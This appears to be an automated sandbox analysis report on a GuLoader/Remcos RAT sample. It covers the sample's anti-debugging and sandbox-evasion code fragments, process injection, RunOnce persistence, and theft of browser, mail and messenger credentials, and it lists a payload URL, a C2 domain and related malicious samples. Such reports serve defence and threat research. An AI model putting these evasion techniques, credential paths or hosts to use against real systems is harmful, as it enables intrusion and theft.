      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 0000000000567F7B second address: 0000000000567F7B instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 012985CBh 0x00000013 xor eax, 524C1329h 0x00000018 add eax, C04F8477h 0x0000001d sub eax, 13B51B58h 0x00000022 cpuid 0x00000024 test dx, bx 0x00000027 bt ecx, 1Fh 0x0000002b jc 00007F72D4A95E56h 0x00000031 popad 0x00000032 call 00007F72D4A958CFh 0x00000037 lfence 0x0000003a rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 00000000005688F0 second address: 0000000000568A77 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b cmp eax, 6AACECEFh 0x00000010 mov eax, dword ptr [esp+1Ch] 0x00000014 mov byte ptr [eax], 00000006h 0x00000017 xor byte ptr [eax], 00000055h 0x0000001a add byte ptr [eax], 00000051h 0x0000001d sub byte ptr [eax], 0000003Ah 0x00000020 mov byte ptr [eax+01h], FFFFFFD2h 0x00000024 xor byte ptr [eax+01h], 00000000h 0x00000028 cmp ah, dh 0x0000002a xor byte ptr [eax+01h], FFFFFFEEh 0x0000002e jmp 00007F72D4EAA309h 0x00000033 cmp cl, 00000013h 0x00000036 add byte ptr [eax+01h], FFFFFFC4h 0x0000003a mov byte ptr [eax+02h], 0000007Eh 0x0000003e cmp bx, 1188h 0x00000043 xor byte ptr [eax+02h], 00000067h 0x00000047 cmp ax, 000008E1h 0x0000004b cmp ax, cx 0x0000004e xor byte ptr [eax+02h], FFFFFFD8h 0x00000052 pushad 0x00000053 mov al, 9Ah 0x00000055 cmp al, 9Ah 0x00000057 jne 00007F72D4EAB46Bh 0x0000005d popad 0x0000005e sub byte ptr [eax+02h], 00000009h 0x00000062 mov edx, dword ptr [ebp+00000138h] 0x00000068 mov dword ptr [eax+03h], edx 0x0000006b pushad 0x0000006c mov eax, 000000EDh 0x00000071 cpuid 0x00000073 popad 0x00000074 mov byte ptr [eax+07h], FFFFFFE2h 0x00000078 xor byte ptr [eax+07h], 00000026h 0x0000007c sub byte ptr [eax+07h], FFFFFF9Fh 0x00000080 xor byte ptr [eax+07h], FFFFFFDAh 0x00000084 test al, al 0x00000086 test dh, ch 0x00000088 mov byte ptr [eax+08h], 0000001Dh 0x0000008c xor byte ptr [eax+08h], FFFFFFACh 0x00000090 add byte ptr [eax+08h], 00000028h 0x00000094 sub byte ptr [eax+08h], 00000009h 0x00000098 cmp dx, B8CFh 0x0000009d pushad 0x0000009e mov edx, 0000005Dh 0x000000a3 rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 0000000000562448 second address: 0000000000562448 instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 0000000000565FAF second address: 0000000000565FAF instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 0000000000569D77 second address: 0000000000569D95 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov eax, B8F5A615h 0x00000010 xor eax, 6BC0978Fh 0x00000015 sub eax, FE90C053h 0x0000001a pushad 0x0000001b lfence 0x0000001e rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 0000000000569DDA second address: 0000000000569DDA instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B962D rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeWindow / User API: threadDelayed 9093
      Source: C:\Users\user\Desktop\loKmeabs9V.exeWindow / User API: foregroundWindowGot 536
      Source: C:\Users\user\Desktop\loKmeabs9V.exe TID: 2000Thread sleep time: -30000s >= -30000s
      Source: C:\Users\user\Desktop\loKmeabs9V.exe TID: 5704Thread sleep count: 9093 > 30
      Source: C:\Users\user\Desktop\loKmeabs9V.exe TID: 5704Thread sleep time: -45465s >= -30000s
      Source: C:\Users\user\Desktop\loKmeabs9V.exeThread sleep count: Count: 9093 delay: -5
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0040AE51 FindFirstFileW,FindNextFileW,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00418981 memset,GetSystemInfo,
      Source: loKmeabs9V.exe, 00000000.00000002.336058548.00000000022C0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll\yourphone.exe\subfolder1Software\Microsoft\Windows\CurrentVersion\RunOnceStartup key
      Source: loKmeabs9V.exe, 00000000.00000002.336058548.00000000022C0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\loKmeabs9V.exeSystem information queried: ModuleInformation
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information queried: ProcessInformation

      Anti Debugging:

      barindex
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\loKmeabs9V.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\loKmeabs9V.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\loKmeabs9V.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B962D rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B6694 LdrInitializeThunk,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B548E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B2C93 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B36C3 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B7B16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B87E3 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B73F1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Injects a PE file into a foreign processesShow sources
      Source: C:\Users\user\Desktop\loKmeabs9V.exeMemory written: C:\Users\user\Desktop\loKmeabs9V.exe base: 400000 value starts with: 4D5A
      Source: C:\Users\user\Desktop\loKmeabs9V.exeMemory written: C:\Users\user\Desktop\loKmeabs9V.exe base: 400000 value starts with: 4D5A
      Source: C:\Users\user\Desktop\loKmeabs9V.exeMemory written: C:\Users\user\Desktop\loKmeabs9V.exe base: 400000 value starts with: 4D5A
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe 'C:\Users\user\Desktop\loKmeabs9V.exe'
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\syqduvyml'
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\cawvvojfhdxf'
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\fubgoguhvlpsyny'
      Source: loKmeabs9V.exe, 0000000E.00000002.1287036124.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: loKmeabs9V.exe, 0000000E.00000002.1287036124.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: loKmeabs9V.exe, 0000000E.00000002.1287036124.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: logs.dat.14.drBinary or memory string: [ Program Manager ]
      Source: loKmeabs9V.exe, 0000000E.00000002.1287036124.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B73AF cpuid
      Source: C:\Users\user\Desktop\loKmeabs9V.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_00407C79 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0041739B GetVersionExW,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information:

      barindex
      GuLoader behavior detectedShow sources
      Source: Initial fileSignature Results: GuLoader behavior
      Yara detected Remcos RATShow sources
      Source: Yara matchFile source: 0000000E.00000002.1286073742.0000000000757000.00000004.00000020.sdmp, type: MEMORY
      Tries to harvest and steal browser information (history, passwords, etc)Show sources
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
      Tries to steal Instant Messenger accounts or passwordsShow sources
      Source: C:\Users\user\Desktop\loKmeabs9V.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
      Source: C:\Users\user\Desktop\loKmeabs9V.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
      Source: C:\Users\user\Desktop\loKmeabs9V.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
      Source: C:\Users\user\Desktop\loKmeabs9V.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
      Source: C:\Users\user\Desktop\loKmeabs9V.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
      Tries to steal Mail credentials (via file access)Show sources
      Source: C:\Users\user\Desktop\loKmeabs9V.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
      Source: C:\Users\user\Desktop\loKmeabs9V.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
      Source: C:\Users\user\Desktop\loKmeabs9V.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
      Source: C:\Users\user\Desktop\loKmeabs9V.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
      Tries to steal Mail credentials (via file registry)Show sources
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: ESMTPPassword
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword

      Remote Access Functionality:

      barindex
      Yara detected Remcos RATShow sources
      Source: Yara matchFile source: 0000000E.00000002.1286073742.0000000000757000.00000004.00000020.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsNative API1Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information1OS Credential Dumping1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobRegistry Run Keys / Startup Folder11Access Token Manipulation1Obfuscated Files or Information3Input Capture11Account Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Process Injection112Software Packing12Credentials in Registry2File and Directory Discovery1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder11Masquerading1Credentials In Files1System Information Discovery329Distributed Component Object ModelInput Capture11Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion23LSA SecretsSecurity Software Discovery731SSHClipboard Data1Data Transfer Size LimitsApplication Layer Protocol212Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsVirtualization/Sandbox Evasion23VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncProcess Discovery4Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 457916 Sample: loKmeabs9V.exe Startdate: 02/08/2021 Architecture: WINDOWS Score: 100 33 Found malware configuration 2->33 35 Multi AV Scanner detection for dropped file 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 8 other signatures 2->39 7 loKmeabs9V.exe 1 2 2->7         started        process3 signatures4 41 Detected unpacking (changes PE section rights) 7->41 43 Tries to steal Mail credentials (via file registry) 7->43 45 Creates autostart registry keys with suspicious values (likely registry only malware) 7->45 47 5 other signatures 7->47 10 loKmeabs9V.exe 2 11 7->10         started        process5 dnsIp6 29 101.99.94.119, 49734, 80 SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY Malaysia 10->29 31 wealthyrem.ddns.net 194.5.97.128, 39200, 49735, 49736 DANILENKODE Netherlands 10->31 23 C:\Users\user\AppData\Local\...\yourphone.exe, PE32 10->23 dropped 25 C:\Users\user\AppData\Local\...\yourphone.vbs, ASCII 10->25 dropped 49 Tries to detect Any.run 10->49 51 Hides threads from debuggers 10->51 53 Installs a global keyboard hook 10->53 55 Injects a PE file into a foreign processes 10->55 15 loKmeabs9V.exe 1 10->15         started        18 loKmeabs9V.exe 13 10->18         started        21 loKmeabs9V.exe 1 10->21         started        file7 signatures8 process9 dnsIp10 57 Tries to steal Instant Messenger accounts or passwords 15->57 59 Tries to steal Mail credentials (via file access) 15->59 27 192.168.2.1 unknown unknown 18->27 61 Tries to harvest and steal browser information (history, passwords, etc) 18->61 signatures11

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      loKmeabs9V.exe20%VirustotalBrowse
      loKmeabs9V.exe13%ReversingLabsWin32.Trojan.Vebzenpak
      loKmeabs9V.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe20%VirustotalBrowse
      C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe6%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe13%ReversingLabsWin32.Trojan.Vebzenpak

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      22.2.loKmeabs9V.exe.400000.0.unpack100%AviraHEUR/AGEN.1116566Download File
      23.2.loKmeabs9V.exe.400000.0.unpack100%AviraHEUR/AGEN.1116590Download File
      24.2.loKmeabs9V.exe.400000.0.unpack100%AviraHEUR/AGEN.1116590Download File
      22.0.loKmeabs9V.exe.400000.0.unpack100%AviraTR/Patched.Ren.Gen2Download File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.imvu.comr0%URL Reputationsafe
      http://101.99.94.119/WEALTH_PRUuqVZw139.bin0%Avira URL Cloudsafe
      http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
      http://www.ebuddy.com0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      wealthyrem.ddns.net
      		194.5.97.128
      		truetrue
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://101.99.94.119/WEALTH_PRUuqVZw139.bintrue
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://www.imvu.com/.exeloKmeabs9V.exe, 00000017.00000002.470384906.000000000019C000.00000004.00000001.sdmpfalse
          		high
          https://www.google.comloKmeabs9V.exefalse
            		high
            http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exeloKmeabs9V.exe, 00000016.00000003.470222066.0000000000A02000.00000004.00000001.sdmpfalse
              		high
              http://www.imvu.comrloKmeabs9V.exe, 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://support.google.com/chrome/answer/6258784loKmeabs9V.exe, 00000016.00000003.471770618.0000000000A18000.00000004.00000001.sdmpfalse
                		high
                http://www.imvu.comloKmeabs9V.exefalse
                  		high
                  https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngloKmeabs9V.exe, 00000016.00000002.473021402.00000000006E8000.00000004.00000020.sdmpfalse
                    		high
                    https://support.google.com/chrome/?p=plugin_flashloKmeabs9V.exe, 00000016.00000003.471770618.0000000000A18000.00000004.00000001.sdmpfalse
                      		high
                      https://www.google.com/accounts/serviceloginloKmeabs9V.exefalse
                        		high
                        https://login.yahoo.com/config/loginloKmeabs9V.exefalse
                          		high
                          http://www.nirsoft.netloKmeabs9V.exe, 00000016.00000002.472368637.0000000000193000.00000004.00000001.sdmpfalse
                            		high
                            http://www.nirsoft.net/loKmeabs9V.exe, loKmeabs9V.exe, 00000018.00000002.471540483.0000000000400000.00000040.00000001.sdmpfalse
                              		high
                              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comloKmeabs9V.exe, 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.ebuddy.comloKmeabs9V.exefalse
                              • URL Reputation: safe
                              		unknown

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              194.5.97.128
                              		wealthyrem.ddns.netNetherlands
                              		208476DANILENKODEtrue
                              101.99.94.119
                              		unknownMalaysia
                              		45839SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYtrue

                              Private

                              IP
                              192.168.2.1

                              General Information

                              Joe Sandbox Version:33.0.0 White Diamond
                              Analysis ID:457916
                              Start date:02.08.2021
                              Start time:14:59:17
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 17m 17s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:loKmeabs9V.exe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Run name:Suspected Instruction Hammering Hide Perf
                              Number of analysed new started processes analysed:41
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.phis.troj.spyw.evad.winEXE@9/4@1/3
                              EGA Information:Failed
                              HDC Information:
                              • Successful, ratio: 50.6% (good quality ratio 40.6%)
                              • Quality average: 62.4%
                              • Quality standard deviation: 38.4%
                              HCA Information:Failed
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .exe
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                              • TCP Packets have been reduced to 100
                              • Excluded IPs from analysis (whitelisted): 13.88.21.125, 168.61.161.212, 20.49.157.6, 23.211.4.86, 93.184.221.240, 40.112.88.60, 80.67.82.211, 80.67.82.235, 20.50.102.62, 20.54.110.249, 20.190.160.134, 20.190.160.8, 20.190.160.71, 20.190.160.4, 20.190.160.75, 20.190.160.129, 20.190.160.67, 20.190.160.132, 51.124.78.146, 20.49.150.241, 20.82.210.154
                              • Excluded domains from analysis (whitelisted): www.tm.lg.prod.aadmsa.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              15:02:10AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.vbs
                              15:02:19AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.vbs

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              No context

                              ASN

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYAudio #Ud83d#Udcde lifewire.org.HTMLGet hashmaliciousBrowse
                              • 111.90.141.176
                              bitratencrypt.exeGet hashmaliciousBrowse
                              • 111.90.149.108
                              svchost.exeGet hashmaliciousBrowse
                              • 111.90.149.108
                              eVF243bmXC.exeGet hashmaliciousBrowse
                              • 111.90.149.108
                              xSnF0lxFUX.exeGet hashmaliciousBrowse
                              • 111.90.146.149
                              QppmM7JmZd.exeGet hashmaliciousBrowse
                              • 111.90.146.149
                              vNiyRd4GcH.exeGet hashmaliciousBrowse
                              • 111.90.146.149
                              4E825059CDC8C2116FF7737EEAD0E6482A2CBF0A5790D.exeGet hashmaliciousBrowse
                              • 111.90.146.149
                              SecuriteInfo.com.Trojan.Win32.Save.a.2038.exeGet hashmaliciousBrowse
                              • 101.99.94.204
                              Minutes of Meeting 22062021.exeGet hashmaliciousBrowse
                              • 111.90.147.240
                              naxpJ9fFZ4.exeGet hashmaliciousBrowse
                              • 111.90.149.115
                              dMH1IIv1a1.exeGet hashmaliciousBrowse
                              • 111.90.149.115
                              bmaphis@cardinaltek.com_16465506 AMDocAtt.HTMLGet hashmaliciousBrowse
                              • 111.90.140.91
                              4cDyOofgzT.xlsmGet hashmaliciousBrowse
                              • 101.99.95.230
                              4cDyOofgzT.xlsmGet hashmaliciousBrowse
                              • 101.99.95.230
                              341288734918_06172021.xlsmGet hashmaliciousBrowse
                              • 101.99.95.230
                              341288734918_06172021.xlsmGet hashmaliciousBrowse
                              • 101.99.95.230
                              kctD8brhzU.exeGet hashmaliciousBrowse
                              • 111.90.146.149
                              Rebate_612426110_06142021.xlsmGet hashmaliciousBrowse
                              • 111.90.151.193
                              Rebate_612426110_06142021.xlsmGet hashmaliciousBrowse
                              • 111.90.151.193
                              DANILENKODE1niECmfIcE.exeGet hashmaliciousBrowse
                              • 194.5.97.94
                              Nuzbcdoajgupgalxelbnohzzeonlplvuro.exeGet hashmaliciousBrowse
                              • 194.5.98.7
                              RueoUfi1MZ.exeGet hashmaliciousBrowse
                              • 194.5.98.3
                              Departamento de contadores Consejos de pago 0.exeGet hashmaliciousBrowse
                              • 194.5.98.7
                              04_extracted.exeGet hashmaliciousBrowse
                              • 194.5.97.18
                              scanorder01321.jarGet hashmaliciousBrowse
                              • 194.5.98.243
                              scanorder01321.jarGet hashmaliciousBrowse
                              • 194.5.98.243
                              PO.exeGet hashmaliciousBrowse
                              • 194.5.98.23
                              PO B4007121.exeGet hashmaliciousBrowse
                              • 194.5.98.7
                              WzOSphO1Np.exeGet hashmaliciousBrowse
                              • 194.5.98.107
                              QUOTATION-007222021.exeGet hashmaliciousBrowse
                              • 194.5.97.145
                              PO B4007121.exeGet hashmaliciousBrowse
                              • 194.5.98.7
                              ORDER407-395.exeGet hashmaliciousBrowse
                              • 194.5.98.23
                              Bank Copy.pdf.exeGet hashmaliciousBrowse
                              • 194.5.98.8
                              FATURAA No.072221.exeGet hashmaliciousBrowse
                              • 194.5.98.158
